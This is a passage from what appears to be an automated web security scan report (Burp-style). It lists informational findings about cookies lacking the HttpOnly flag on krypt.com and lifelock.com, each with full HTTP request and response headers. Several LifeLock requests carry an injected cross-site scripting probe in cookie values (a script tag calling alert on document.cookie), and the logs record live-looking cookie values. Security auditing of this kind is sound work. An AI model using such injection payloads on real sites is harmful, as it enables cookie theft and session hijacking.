Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.6.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:31 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:36 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 25090

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Datacent
...[SNIP]...

18.494. http://www.krypt.com/why-us/network/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/network/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /why-us/network/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.6.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:41:08 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:41:15 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 24420

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Network
...[SNIP]...

18.495. http://www.lifelock.com/about/leadership/management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/leadership/management/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/leadership/management/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.3.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/36

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:40 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=5edc90cce91794bf0665f56269037cf23ec073d706939dfc4db39618; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18319

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...

18.496. http://www.lifelock.com/about/lifelock-in-the-community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/lifelock-in-the-community/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/lifelock-in-the-community/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=3e9d64599ec3dc11eab7f4125fe101c63ec073d706939dfc4db392a6; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.2.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/2/9

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:29 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 15989

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...

18.497. http://www.lifelock.com/guarantee/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /guarantee/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /guarantee/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.6.10.1303613800; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/54

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:17:27 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=e79e595a9a6e903362da05ead0d93f2e3ec073d706939dfc4db39647; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13369

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...

18.498. http://www.lifelock.com/how-it-works/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /how-it-works/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /how-it-works/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:17:09 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=826975d177156eda9471c5c85b3f54f03ec073d706939dfc4db39635; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 12670

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...

18.499. http://www.lifelock.com/identity-theft/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /identity-theft/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /identity-theft/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:17:11 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=865a03cababcc82b8d974302632bfb143ec073d706939dfc4db39637; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 32685

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...

18.500. http://www.lifelock.com/lifelock-for-people  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /lifelock-for-people

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lifelock-for-people HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; TSceba2f=d03f174909aa821fd06beafbefcefa10f2f0945343012f3c4db449cd; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 16:47:41 GMT
Location: http://www.lifelock.com/services/
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TSceba2f=68442ea13cc668c3f9534c1f2a818f2bf2f0945343012f3c4db4542d; Path=/
Content-Length: 241
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.lifelock.com
...[SNIP]...

18.501. http://www.lifelock.com/offers/faces/female/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /offers/faces/female/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/faces/female/?promocodehide=ADCONIONRT&c3metrics=adcon HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; LifeLockEnrollment=promoCode=GOOGSEARCH13; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:33:06 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpool_www.lifelock.com=335809034.20480.0000; path=/
Set-Cookie: TSceba2f=a1dd5475d17a0429c45b558d5def1feccc7981bb25f0484c4db41882; Path=/
Vary: Accept-Encoding
Connection: close

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...

18.502. http://www.lifelock.com/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=68442ea13cc668c3f9534c1f2a818f2bf2f0945343012f3c4db4542d

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:47:42 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=d8c1f16f42bc8bee3379313534313201632367929eb271604db4542e; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13517

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...

18.503. http://www.lifelock.com/services/command-center/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /services/command-center/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/command-center/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; TSceba2f=672a43aa9e4e9b5fe762c7f07c003e9cd78ab7a6ed034dd24db4542d; __utma=182152376.1080477552.1303613800.1303660958.1303663668.4; __utmc=182152376; __utmb=182152376.1.10.1303663668; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/47/48

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:48:01 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=578734b64e67c084c0355516c462736c1debaef3a49de19f4db45441; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13351

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...

18.504. http://www.lijit.com/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /beacon

Issue detail

